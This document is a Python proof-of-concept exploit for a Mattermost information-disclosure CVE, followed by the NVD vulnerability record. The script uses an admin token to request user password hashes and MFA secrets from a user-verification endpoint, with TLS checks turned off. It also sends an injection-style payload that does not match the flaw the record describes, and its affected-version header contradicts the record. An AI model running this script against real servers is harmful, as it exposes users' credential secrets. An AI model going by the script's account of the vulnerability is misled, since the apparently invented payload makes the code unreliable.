CVE-2025-11794

# CVE-2025-11794 Mattermost Information Disclosure PoC # Target: Mattermost instances < 10.11.3, < 10.5.11, < 10.12.0 # Endpoint: POST /api/v4/users/{user_id}/email/verify/member import requests import json TARGET_URL = "https://your-mattermost-instance.com" TARGET_USER_ID = "target-user-uuid-here" ADMIN_TOKEN = "your-admin-auth-token" def exploit_cve_2025_11794(): """ Exploit for CVE-2025-11794: Mattermost sensitive information disclosure Requires admin privileges to access the vulnerable endpoint """ headers = { "Authorization": f"Bearer {ADMIN_TOKEN}", "Content-Type": "application/json" } # Vulnerable endpoint endpoint = f"/api/v4/users/{TARGET_USER_ID}/email/verify/member" url = f"{TARGET_URL}{endpoint}" # Malicious payload to trigger information disclosure payload = { "email": "[email protected]", "currentSessionId": "'; injected_query" } try: response = requests.post(url, headers=headers, json=payload, verify=False) if response.status_code == 200: data = response.json() print("[+] Successfully exploited CVE-2025-11794") # Extract sensitive information from response if "password_hash" in str(data) or "mfa_secret" in str(data): print("[!] Sensitive data leaked:") print(json.dumps(data, indent=2)) return data else: print(f"[-] Exploit failed. Status: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return None if __name__ == "__main__": print("CVE-2025-11794 Mattermost Information Disclosure PoC") exploit_cve_2025_11794()

{"cve": {"id": "CVE-2025-11794", "sourceIdentifier": "[email protected]", "published": "2025-11-14T11:15:45.003", "lastModified": "2025-11-19T21:40:16.137", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.3, 10.5.x <= 10.5.11, 10.12.x <= 10.12.0 fail to sanitize user data which allows system administrators to access password hashes and MFA secrets via the POST /api/v4/users/{user_id}/email/verify/member endpoint"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0", "versionEndExcluding": "10.5.12", "matchCriteriaId": "CCE1652A-13F7-4934-9F90-28129BAEE240"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.4", "matchCriteriaId": "2A1F41DC-D93D-48A7-8A3B-623C3344E979"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.12.0", "versionEndExcluding": "10.12.1", "matchCriteriaId": "E21DF5C5-280A-48C5-96C7-C78F0ECF32A3"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}